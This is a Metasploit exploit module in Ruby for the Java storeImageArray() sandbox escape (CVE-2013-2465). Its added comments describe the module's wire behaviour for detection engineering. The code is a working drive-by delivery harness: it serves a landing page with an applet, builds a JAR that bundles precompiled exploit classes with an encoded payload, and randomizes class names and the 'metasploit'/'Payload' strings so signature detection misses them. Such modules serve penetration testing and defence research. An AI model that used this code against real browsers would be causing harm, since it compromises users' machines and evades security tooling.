##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Browser-side delivery harness for CVE-2013-2465 (Java storeImageArray()).
#
# The Ruby code in this file only serves content: an HTML landing page that
# embeds an <applet>, and a JAR assembled from three pre-compiled class files
# read from the framework data directory plus the encoded Java payload. The
# code that actually triggers the vulnerability is inside those compiled
# classes and is not visible here.
#
# Observable on the wire (useful for detection engineering): a redirect to
# the resource path with a trailing slash, an HTML response whose
# <applet archive="..."> points at a randomly named .jar, then a GET for that
# .jar answered with Content-Type application/java-archive. Class names and
# JAR entry names are randomized in #setup and #generate_jar, so signatures
# keyed on the literal "Exploit"/"MyColorModel"/"MyColorSpace" or
# "metasploit"/"Payload" strings will not match the bytes that are served.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default

  include Msf::Exploit::Remote::HttpServer::HTML

  # include Msf::Exploit::Remote::BrowserAutopwn
  # autopwn_info({ :javascript => false })

  # Module metadata (name, description, references, platforms, targets)
  # passed to the framework through update_info. Target 0 (generic Java
  # payload) is the default; there is no per-target branching anywhere else
  # in this file, so the x86 Windows/Linux targets go through the same
  # request handling and JAR build.
  #
  # @param info [Hash] metadata overrides supplied by the framework
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Java storeImageArray() Invalid Array Indexing Vulnerability',
        'Description' => %q{
          This module abuses an Invalid Array Indexing Vulnerability on the
          static function storeImageArray() function in order to cause a
          memory corruption and escape the Java Sandbox. The vulnerability
          affects Java version 7u21 and earlier. The module, which doesn't bypass
          click2play, has been tested successfully on Java 7u21 on Windows and
          Linux systems.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Unknown', # From PacketStorm
          'sinn3r', # Metasploit
          'juan vazquez' # Metasploit
        ],
        'References' => [
          [ 'CVE', '2013-2465' ],
          [ 'OSVDB', '96269' ],
          [ 'EDB', '27526' ],
          [ 'PACKETSTORM', '122777' ],
          [ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/2a9c79db0040' ]
        ],
        'Platform' => %w{java linux win},
        # Payload options are forwarded unchanged; the meaning of the 20480
        # byte limit is not derivable from this file.
        'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
        'Targets' => [
          [
            'Generic (Java Payload)',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => 'java'
            }
          ],
          [
            'Windows Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win'
            }
          ],
          [
            'Linux x86',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'linux'
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2013-08-12',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Reads the three compiled classes from data/exploits/CVE-2013-2465/ in the
  # framework data directory and rewrites the class names embedded in them.
  #
  # Every replacement is produced by rand_text_alpha at exactly the length of
  # the name it replaces ("Exploit", "MyColorModel", "MyColorSpace") and is
  # applied as a plain byte-level gsub! to all three blobs. Keeping the
  # length identical leaves the class files the same size — presumably so the
  # encoded name entries inside them stay consistent without re-encoding
  # (TODO confirm against the class file format). The gsub! return values are
  # unused, so the nil returned when nothing matches is harmless.
  #
  # The randomized names are chosen once per setup and reused by
  # #generate_html (applet code=) and #generate_jar (entry names).
  #
  # @raise [Errno::ENOENT] if one of the class files is missing
  def setup
    # Each file is opened in binary mode and read in full (fd.stat.size bytes).
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-2465", "Exploit.class")
    @exploit_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-2465", "Exploit$MyColorModel.class")
    @color_model_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-2465", "Exploit$MyColorSpace.class")
    @color_space_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }

    # Same-length random replacements for each original class name.
    @exploit_class_name = rand_text_alpha("Exploit".length)
    @color_model_class_name = rand_text_alpha("MyColorModel".length)
    @color_space_class_name = rand_text_alpha("MyColorSpace".length)

    # All three names can appear in all three blobs (outer/inner class
    # references), so the full substitution set is applied to each one.
    @exploit_class.gsub!("Exploit", @exploit_class_name)
    @exploit_class.gsub!("MyColorModel", @color_model_class_name)
    @exploit_class.gsub!("MyColorSpace", @color_space_class_name)

    @color_model_class.gsub!("Exploit", @exploit_class_name)
    @color_model_class.gsub!("MyColorModel", @color_model_class_name)
    @color_model_class.gsub!("MyColorSpace", @color_space_class_name)

    @color_space_class.gsub!("Exploit", @exploit_class_name)
    @color_space_class.gsub!("MyColorModel", @color_model_class_name)
    @color_space_class.gsub!("MyColorSpace", @color_space_class_name)

    # Framework setup runs last, after the instance state above is ready.
    super
  end

  # HTTP dispatch for every request that reaches the module's resource.
  #
  # A URI that does not end in ".jar" is treated as the landing page: without
  # a trailing slash the client is redirected to "#{get_resource}/" (the
  # relative archive= attribute in the page then resolves against that
  # directory-style URL — inferred, not stated in this file); with a trailing
  # slash the HTML page is returned. A ".jar" URI gets a freshly built
  # archive with Content-Type application/java-archive, after which the
  # framework-provided handler(cli) is invoked.
  #
  # NOTE(review): `if not request.uri =~ /\/$/` reads more clearly as
  # `unless request.uri.end_with?('/')`; for URIs without embedded newlines
  # the two are equivalent, so this is style only.
  #
  # @param cli the client connection handed in by the HttpServer mixin
  # @param request the parsed request; only #uri is read here
  def on_request_uri(cli, request)
    vprint_status("Requesting: #{request.uri}")
    if request.uri !~ /\.jar$/i
      if not request.uri =~ /\/$/
        vprint_status("Sending redirect...")
        send_redirect(cli, "#{get_resource}/", '')
        return
      end

      print_status("Sending HTML...")
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
      return
    end

    print_status("Sending .jar file...")
    send_response(cli, generate_jar(cli), { 'Content-Type' => 'application/java-archive' })

    handler(cli)
  end

  # Builds the landing page: a bare HTML document with a single <applet>
  # whose archive= is a random 5–7 letter .jar name (5 + rand(3)) and whose
  # code= is the randomized exploit class name chosen in #setup.
  #
  # The %Q literal is indented by four spaces to line up with the method
  # body; the gsub(/^ {4}/, '') afterwards strips exactly that indentation
  # from every line so the served HTML starts at column 0. Changing the
  # literal's indentation without updating the regexp changes the output.
  #
  # @return [String] the HTML page
  def generate_html
    jar_name = rand_text_alpha(5 + rand(3))
    html = %Q|<html>
    <head>
    </head>
    <body>
    <applet archive="#{jar_name}.jar" code="#{@exploit_class_name}" width="1000" height="1000">
    </applet>
    </body>
    </html>
    |
    html = html.gsub(/^ {4}/, '')
    return html
  end

  # Assembles the JAR served in response to the ".jar" request.
  #
  # Starts from the encoded payload JAR returned by regenerate_payload(cli)
  # and adds the three renamed class files under the names chosen in #setup
  # (inner classes as Outer$Inner.class). Every entry name and entry body
  # then has the substrings "metasploit" and "Payload" replaced with
  # same-length random strings (10 and 7 characters respectively) before the
  # manifest is rebuilt and the archive packed. entry.name is mutated in
  # place with gsub! while entry.data is reassigned from a non-destructive
  # gsub; whether the jar entry object requires that distinction is not
  # visible here — confirm against the JAR helper's API.
  #
  # @param cli the client connection, used only to regenerate the payload
  # @return the packed archive from jar.pack (presumably a String of bytes)
  def generate_jar(cli)
    p = regenerate_payload(cli)
    jar = p.encoded_jar

    jar.add_file("#{@exploit_class_name}.class", @exploit_class)
    jar.add_file("#{@exploit_class_name}$#{@color_model_class_name}.class", @color_model_class)
    jar.add_file("#{@exploit_class_name}$#{@color_space_class_name}.class", @color_space_class)
    # Same-length replacements, mirroring the approach used in #setup.
    metasploit_str = rand_text_alpha("metasploit".length)
    payload_str = rand_text_alpha("payload".length)
    jar.entries.each { |entry|
      entry.name.gsub!("metasploit", metasploit_str)
      entry.name.gsub!("Payload", payload_str)
      entry.data = entry.data.gsub("metasploit", metasploit_str)
      entry.data = entry.data.gsub("Payload", payload_str)
    }
    # Manifest is regenerated after the renames so it reflects the new entry names.
    jar.build_manifest

    return jar.pack
  end
end